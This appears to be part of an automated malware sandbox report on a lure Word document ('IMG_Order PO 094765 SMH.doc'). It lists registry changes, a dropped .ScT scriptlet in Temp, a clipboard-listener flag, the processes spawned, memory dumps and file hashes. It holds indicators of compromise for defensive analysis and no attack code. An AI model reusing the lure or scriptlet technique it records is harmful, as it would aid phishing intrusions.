Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1982692896-3042838041-473469356-1040697758-2606466529-2719151250-1045455430\Moniker = "oice_16_974fa576_32c1d314_2c4d" C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key deleted \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_2c4d\Children C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key deleted \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_2c4d C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key deleted \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1982692896-3042838041-473469356-1040697758-2606466529-2719151250-1045455430\Children C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key created \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1982692896-3042838041-473469356-1040697758-2606466529-2719151250-1045455430 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key created \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_2c4d\Children C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Temp\{CA9C42FE-C6D8-4AC5-94BA-E589FFB74762}\abdtfhghgeghDh.ScT:Zone.Identifier C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\IMG_Order PO 094765 SMH.doc" /o ""

C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE

"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE" C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT

Network

Files

memory/396-114-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

memory/396-115-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

memory/396-116-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

memory/396-117-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

memory/396-118-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

memory/396-119-0x00007FFF9BED0000-0x00007FFF9E9F3000-memory.dmp

memory/396-122-0x00000251CF710000-0x00000251D07FE000-memory.dmp

memory/396-123-0x00007FFF948B0000-0x00007FFF967A5000-memory.dmp

memory/3984-360-0x0000000000000000-mapping.dmp

memory/3984-362-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

memory/3984-363-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

memory/3984-364-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\oice_16_974fa576_32c1d314_2c4d\AC\Temp\FLD04B.tmp

MD5 4f49c7dac1d379d2e5171a6bef32e0eb
SHA1 0c465f4780546c2fb375664844febba5e8d9e09e
SHA256 d08ab9ca7aa34921beadff1e9fe010f4deda6561086bf7ef28853976abb1b413
SHA512 c3e7880c59f08790e7546829ac8987d6ca41350af44658fcf08c5e83c05a3566eb9f43b065bfe9da61c0a676199f6df50b8bf9ed97982ad62f920ad407bf5f50

memory/3984-366-0x00007FFF79C30000-0x00007FFF79C40000-memory.dmp